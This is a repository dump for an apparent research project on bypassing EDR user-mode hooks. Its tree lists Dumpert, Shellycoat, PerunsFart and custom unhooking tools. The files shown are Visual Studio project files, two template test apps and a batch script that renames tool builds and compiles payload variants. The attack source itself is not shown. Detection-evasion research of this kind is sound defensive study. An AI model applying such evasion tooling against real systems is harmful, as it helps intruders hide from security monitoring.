├── ApplicationsToCheckForHooks ├── SomeConProgram │ ├── SomeConProgram.sln │ └── SomeConProgram │ │ ├── SomeConProgram.cpp │ │ ├── SomeConProgram.vcxproj │ │ ├── SomeConProgram.vcxproj.filters │ │ └── SomeConProgram.vcxproj.user └── SomeDeskProject │ ├── SomeDeskProject.sln │ └── SomeDeskProject │ ├── Resource.h │ ├── SomeDeskProject.cpp │ ├── SomeDeskProject.h │ ├── SomeDeskProject.ico │ ├── SomeDeskProject.rc │ ├── SomeDeskProject.vcxproj │ ├── SomeDeskProject.vcxproj.filters │ ├── SomeDeskProject.vcxproj.user │ ├── framework.h │ ├── small.ico │ └── targetver.h ├── CollectRequiredFiles.bat ├── CustomCode ├── CustomCode.sln ├── HookFinder │ ├── HookDetector.h │ ├── HookFinder.filters │ ├── HookFinder.vcxproj │ ├── Syscalls.asm │ ├── main.cpp │ ├── main.cpp.old.relocation │ ├── main.h │ ├── sysc_sw2.asm │ └── sysc_sw2.h ├── InterprocessMethodCloning │ ├── InterProcessFunctionCopying.h │ ├── InterprocessMethodCloning.vcxproj │ ├── InterprocessMethodCloning.vcxproj.filters │ ├── Syscalls.asm │ ├── main.cpp │ ├── sysc_sw2.asm │ └── sysc_sw2.h ├── InterprocessSectionCopying │ ├── InterProcessSectionCopying.h │ ├── InterProcessSectionCopying.vcxproj │ ├── InterProcessSectionCopying.vcxproj.filters │ ├── Syscalls.asm │ ├── main.cpp │ ├── sysc_sw2.asm │ └── sysc_sw2.h ├── PaLoCF │ ├── PaLoCF.cpp │ ├── PaLoCF.vcxproj │ └── PaLoCF.vcxproj.filters ├── PaLoInj │ ├── PaLoInj.cpp │ ├── PaLoInj.vcxproj │ └── PaLoInj.vcxproj.filters ├── PaLoIns │ ├── PaLoIns.cpp │ ├── PaLoIns.vcxproj │ └── PaLoIns.vcxproj.filters ├── PerunsFart │ ├── PerunsFart.cpp │ ├── PerunsFart.h │ ├── PerunsFart.vcxproj │ ├── PerunsFart.vcxproj.filters │ ├── Syscalls.asm │ ├── main.cpp │ └── sysc_sw2.asm └── compile_slightly_different_payloads.bat ├── DumpertResearch ├── Outflank-Dumpert.sln └── Outflank-Dumpert │ ├── Dumpert.cpp │ ├── Dumpert.h │ ├── Outflank-Dumpert.vcxproj │ ├── Outflank-Dumpert.vcxproj.filters │ └── Syscalls.asm ├── ExperimentScript ├── runAllExperiments.ps1 └── 
runHookCorruptorExperiments.ps1 ├── HookCorruptor ├── Outflank-Dumpert.sln └── Outflank-Dumpert │ ├── Dumpert.cpp │ ├── Dumpert.h │ ├── Outflank-Dumpert.vcxproj │ ├── Outflank-Dumpert.vcxproj.filters │ └── Syscalls.asm ├── README.md └── ShellycoatResearch ├── Bin ├── shellycoat_x64-hexedited.bin ├── shellycoat_x64-hexedited.dll └── shellycoat_x64.dll ├── LICENSE ├── Python ├── ConvertToShellcode.py ├── ShellcodeRDI.py └── __pycache__ │ └── ShellcodeRDI.cpython-39.pyc ├── README.md ├── Screenshots ├── bypass-techniques.png ├── capa.PNG ├── hooking.gif ├── reading-ntdll.png ├── section-remapping.png ├── shellycoat-internal.gif ├── unhooking.gif └── why-syscall.png ├── Src ├── SectionRemap.h ├── Structs.h ├── Syscalls.h ├── dllmain.cpp ├── stub.binaaa ├── sysc_sw1.asm ├── sysc_sw1.h └── syscalls64.asm ├── Testing ├── Loader.cpp ├── compile64.bat └── edr.dll └── compile64_cli2.bat /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31112.23 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SomeConProgram", "SomeConProgram\SomeConProgram.vcxproj", "{DBC3D8EF-136D-4B82-B197-772D47F94A3D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Debug|x64.ActiveCfg = Debug|x64 17 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Debug|x64.Build.0 = Debug|x64 18 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Debug|x86.ActiveCfg = Debug|Win32 19 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Debug|x86.Build.0 = Debug|Win32 20 | 
{DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Release|x64.ActiveCfg = Release|x64 21 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Release|x64.Build.0 = Release|x64 22 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Release|x86.ActiveCfg = Release|Win32 23 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {AF4A9AEB-59F7-4A3D-8275-411A0C919EDC} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram/SomeConProgram.cpp: -------------------------------------------------------------------------------- 1 | // SomeConProgram.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include 5 | 6 | int main() 7 | { 8 | printf("This is a simple console app\n"); 9 | printf("Press Any Key to Continue\n"); 10 | getchar(); 11 | } 12 | 13 | // Run program: Ctrl + F5 or Debug > Start Without Debugging menu 14 | // Debug program: F5 or Debug > Start Debugging menu 15 | 16 | // Tips for Getting Started: 17 | // 1. Use the Solution Explorer window to add/manage files 18 | // 2. Use the Team Explorer window to connect to source control 19 | // 3. Use the Output window to see build output and other messages 20 | // 4. Use the Error List window to view errors 21 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 22 | // 6. 
In the future, to open this project again, go to File > Open > Project and select the .sln file 23 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram/SomeConProgram.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {dbc3d8ef-136d-4b82-b197-772d47f94a3d} 25 | SomeConProgram 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram/SomeConProgram.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 
| 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram/SomeConProgram.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31112.23 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SomeDeskProject", "SomeDeskProject\SomeDeskProject.vcxproj", "{56F8060F-CC95-412A-88CB-D8A25C3F718A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Debug|x64.ActiveCfg = Debug|x64 17 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Debug|x64.Build.0 = Debug|x64 18 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Debug|x86.ActiveCfg = Debug|Win32 19 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Debug|x86.Build.0 = Debug|Win32 20 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Release|x64.ActiveCfg = Release|x64 21 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Release|x64.Build.0 = Release|x64 
22 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Release|x86.ActiveCfg = Release|Win32 23 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {F73C855F-4FB0-4188-99E3-FA14B729F48D} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/Resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by SomeDeskProject.rc 4 | 5 | #define IDS_APP_TITLE 103 6 | 7 | #define IDR_MAINFRAME 128 8 | #define IDD_SOMEDESKPROJECT_DIALOG 102 9 | #define IDD_ABOUTBOX 103 10 | #define IDM_ABOUT 104 11 | #define IDM_EXIT 105 12 | #define IDI_SOMEDESKPROJECT 107 13 | #define IDI_SMALL 108 14 | #define IDC_SOMEDESKPROJECT 109 15 | #define IDC_MYICON 2 16 | #ifndef IDC_STATIC 17 | #define IDC_STATIC -1 18 | #endif 19 | // Next default values for new objects 20 | // 21 | #ifdef APSTUDIO_INVOKED 22 | #ifndef APSTUDIO_READONLY_SYMBOLS 23 | 24 | #define _APS_NO_MFC 130 25 | #define _APS_NEXT_RESOURCE_VALUE 129 26 | #define _APS_NEXT_COMMAND_VALUE 32771 27 | #define _APS_NEXT_CONTROL_VALUE 1000 28 | #define _APS_NEXT_SYMED_VALUE 110 29 | #endif 30 | #endif 31 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.cpp: -------------------------------------------------------------------------------- 1 | // SomeDeskProject.cpp : Defines the entry point for the application. 
2 | // 3 | 4 | #include "framework.h" 5 | #include "SomeDeskProject.h" 6 | 7 | #define MAX_LOADSTRING 100 8 | 9 | // Global Variables: 10 | HINSTANCE hInst; // current instance 11 | WCHAR szTitle[MAX_LOADSTRING]; // The title bar text 12 | WCHAR szWindowClass[MAX_LOADSTRING]; // the main window class name 13 | 14 | // Forward declarations of functions included in this code module: 15 | ATOM MyRegisterClass(HINSTANCE hInstance); 16 | BOOL InitInstance(HINSTANCE, int); 17 | LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); 18 | INT_PTR CALLBACK About(HWND, UINT, WPARAM, LPARAM); 19 | 20 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, 21 | _In_opt_ HINSTANCE hPrevInstance, 22 | _In_ LPWSTR lpCmdLine, 23 | _In_ int nCmdShow) 24 | { 25 | UNREFERENCED_PARAMETER(hPrevInstance); 26 | UNREFERENCED_PARAMETER(lpCmdLine); 27 | 28 | // TODO: Place code here. 29 | 30 | // Initialize global strings 31 | LoadStringW(hInstance, IDS_APP_TITLE, szTitle, MAX_LOADSTRING); 32 | LoadStringW(hInstance, IDC_SOMEDESKPROJECT, szWindowClass, MAX_LOADSTRING); 33 | MyRegisterClass(hInstance); 34 | 35 | // Perform application initialization: 36 | if (!InitInstance (hInstance, nCmdShow)) 37 | { 38 | return FALSE; 39 | } 40 | 41 | HACCEL hAccelTable = LoadAccelerators(hInstance, MAKEINTRESOURCE(IDC_SOMEDESKPROJECT)); 42 | 43 | MSG msg; 44 | 45 | // Main message loop: 46 | while (GetMessage(&msg, nullptr, 0, 0)) 47 | { 48 | if (!TranslateAccelerator(msg.hwnd, hAccelTable, &msg)) 49 | { 50 | TranslateMessage(&msg); 51 | DispatchMessage(&msg); 52 | } 53 | } 54 | 55 | return (int) msg.wParam; 56 | } 57 | 58 | 59 | 60 | // 61 | // FUNCTION: MyRegisterClass() 62 | // 63 | // PURPOSE: Registers the window class. 
64 | // 65 | ATOM MyRegisterClass(HINSTANCE hInstance) 66 | { 67 | WNDCLASSEXW wcex; 68 | 69 | wcex.cbSize = sizeof(WNDCLASSEX); 70 | 71 | wcex.style = CS_HREDRAW | CS_VREDRAW; 72 | wcex.lpfnWndProc = WndProc; 73 | wcex.cbClsExtra = 0; 74 | wcex.cbWndExtra = 0; 75 | wcex.hInstance = hInstance; 76 | wcex.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(IDI_SOMEDESKPROJECT)); 77 | wcex.hCursor = LoadCursor(nullptr, IDC_ARROW); 78 | wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1); 79 | wcex.lpszMenuName = MAKEINTRESOURCEW(IDC_SOMEDESKPROJECT); 80 | wcex.lpszClassName = szWindowClass; 81 | wcex.hIconSm = LoadIcon(wcex.hInstance, MAKEINTRESOURCE(IDI_SMALL)); 82 | 83 | return RegisterClassExW(&wcex); 84 | } 85 | 86 | // 87 | // FUNCTION: InitInstance(HINSTANCE, int) 88 | // 89 | // PURPOSE: Saves instance handle and creates main window 90 | // 91 | // COMMENTS: 92 | // 93 | // In this function, we save the instance handle in a global variable and 94 | // create and display the main program window. 95 | // 96 | BOOL InitInstance(HINSTANCE hInstance, int nCmdShow) 97 | { 98 | hInst = hInstance; // Store instance handle in our global variable 99 | 100 | HWND hWnd = CreateWindowW(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW, 101 | CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, nullptr, nullptr, hInstance, nullptr); 102 | 103 | if (!hWnd) 104 | { 105 | return FALSE; 106 | } 107 | 108 | ShowWindow(hWnd, nCmdShow); 109 | UpdateWindow(hWnd); 110 | 111 | return TRUE; 112 | } 113 | 114 | // 115 | // FUNCTION: WndProc(HWND, UINT, WPARAM, LPARAM) 116 | // 117 | // PURPOSE: Processes messages for the main window. 
118 | // 119 | // WM_COMMAND - process the application menu 120 | // WM_PAINT - Paint the main window 121 | // WM_DESTROY - post a quit message and return 122 | // 123 | // 124 | LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) 125 | { 126 | switch (message) 127 | { 128 | case WM_COMMAND: 129 | { 130 | int wmId = LOWORD(wParam); 131 | // Parse the menu selections: 132 | switch (wmId) 133 | { 134 | case IDM_ABOUT: 135 | DialogBox(hInst, MAKEINTRESOURCE(IDD_ABOUTBOX), hWnd, About); 136 | break; 137 | case IDM_EXIT: 138 | DestroyWindow(hWnd); 139 | break; 140 | default: 141 | return DefWindowProc(hWnd, message, wParam, lParam); 142 | } 143 | } 144 | break; 145 | case WM_PAINT: 146 | { 147 | PAINTSTRUCT ps; 148 | HDC hdc = BeginPaint(hWnd, &ps); 149 | // TODO: Add any drawing code that uses hdc here... 150 | EndPaint(hWnd, &ps); 151 | } 152 | break; 153 | case WM_DESTROY: 154 | PostQuitMessage(0); 155 | break; 156 | default: 157 | return DefWindowProc(hWnd, message, wParam, lParam); 158 | } 159 | return 0; 160 | } 161 | 162 | // Message handler for about box. 
163 | INT_PTR CALLBACK About(HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam) 164 | { 165 | UNREFERENCED_PARAMETER(lParam); 166 | switch (message) 167 | { 168 | case WM_INITDIALOG: 169 | return (INT_PTR)TRUE; 170 | 171 | case WM_COMMAND: 172 | if (LOWORD(wParam) == IDOK || LOWORD(wParam) == IDCANCEL) 173 | { 174 | EndDialog(hDlg, LOWORD(wParam)); 175 | return (INT_PTR)TRUE; 176 | } 177 | break; 178 | } 179 | return (INT_PTR)FALSE; 180 | } 181 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "resource.h" 4 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.ico -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.rc -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 
| Win32Proj 24 | {56f8060f-cc95-412a-88cb-d8a25c3f718a} 25 | SomeDeskProject 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Windows 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Windows 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Windows 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Windows 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 
24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | 37 | 38 | Resource Files 39 | 40 | 41 | 42 | 43 | Resource Files 44 | 45 | 46 | Resource Files 47 | 48 | 49 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/framework.h: -------------------------------------------------------------------------------- 1 | // header.h : include file for standard system include files, 2 | // or project specific include files 3 | // 4 | 5 | #pragma once 6 | 7 | #include "targetver.h" 8 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 9 | // Windows Header Files 10 | #include 11 | // C RunTime Header Files 12 | #include 13 | #include 14 | #include 15 | #include 16 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/small.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/small.ico -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // // Including SDKDDKVer.h defines the highest available Windows platform. 
4 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 5 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 6 | #include 7 | -------------------------------------------------------------------------------- /CollectRequiredFiles.bat: -------------------------------------------------------------------------------- 1 | rem Run this script from a x64 Native Tools Command Prompt 2 | 3 | copy DumpertResearch\x64\Release\Outflank-Dumpert.exe RequiredFiles\UHPR.exe 4 | copy ShellycoatResearch\Bin\shellycoat_x64.exe RequiredFiles\UHSR.exe 5 | copy HookDetectorTM\x64\Release\InterProcessFunctionCopying.exe RequiredFiles\UHIF.exe 6 | copy HookDetectorTM\x64\Release\InterProcessSectionCopying.exe RequiredFiles\UHIS.exe 7 | copy HookDetectorTM\x64\Release\HookDetector.exe RequiredFiles\HooDet.exe 8 | copy HookDetectorTM\x64\Release\PerunsFart.exe RequiredFiles\UHPF.exe 9 | 10 | call "HookDetectorTM\compile_slightly_different_payloads.bat" 11 | copy HookDetectorTM\*.exe RequiredFiles 12 | 13 | copy ExperimentScript\*.* RequiredFiles 14 | 15 | 16 | -------------------------------------------------------------------------------- /CustomCode/CustomCode.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31112.23 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InterProcessFunctionCopying", "InterprocessMethodCloning\InterprocessMethodCloning.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InterProcessSectionCopying", "InterProcessSectionCopying\InterprocessSectionCopying.vcxproj", "{17A0003B-18DC-1157-1F09-1B90AAEFBDF4}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = 
"HookDetector", "HookFinder\HookFinder.vcxproj", "{C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}" 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PaLoInj", "PaLoInj\PaLoInj.vcxproj", "{2F83EC28-30EA-4FF5-843B-EE474D66B935}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PaLoCF", "PaLoCF\PaLoCF.vcxproj", "{594AD1A0-2692-4C42-BC7B-B1799E500CC6}" 15 | EndProject 16 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PaLoIns", "PaLoIns\PaLoIns.vcxproj", "{5785080C-1A0F-4C44-A7CD-B65504B3A62A}" 17 | EndProject 18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PerunsFart", "PerunsFart\PerunsFart.vcxproj", "{DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}" 19 | EndProject 20 | Global 21 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 22 | Debug|x64 = Debug|x64 23 | Debug|x86 = Debug|x86 24 | Release|x64 = Release|x64 25 | Release|x86 = Release|x86 26 | EndGlobalSection 27 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 28 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 29 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 30 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 31 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 32 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 33 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 34 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 35 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 36 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 37 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 38 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 39 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 40 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Release|x64.ActiveCfg = 
Release|x64 41 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 42 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 43 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 44 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 45 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 46 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 47 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 48 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 49 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 50 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 51 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 52 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Debug|x64.ActiveCfg = Debug|x64 53 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Debug|x64.Build.0 = Debug|x64 54 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Debug|x86.ActiveCfg = Debug|Win32 55 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Debug|x86.Build.0 = Debug|Win32 56 | 